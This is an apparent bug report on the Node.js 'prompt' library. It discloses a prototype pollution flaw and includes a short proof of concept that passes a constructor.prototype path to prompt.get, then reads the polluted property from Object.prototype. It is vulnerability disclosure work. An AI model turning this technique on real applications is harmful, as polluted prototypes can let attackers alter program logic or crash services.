A potential prototype pollution #231
Description
I have found a potential prototype pollution, here is an example PoC:
var prompt = require('prompt');
prompt.get({path: ['constructor', 'prototype', 'polluted'] }, function(err, res) {
console.log(res);
console.log(Object.prototype.polluted); // print the input string
});
I think that the implementation of the function build and attach(https://github.com/flatiron/prompt/blob/master/lib/prompt.js#L337) in prompt.js should be enhanced.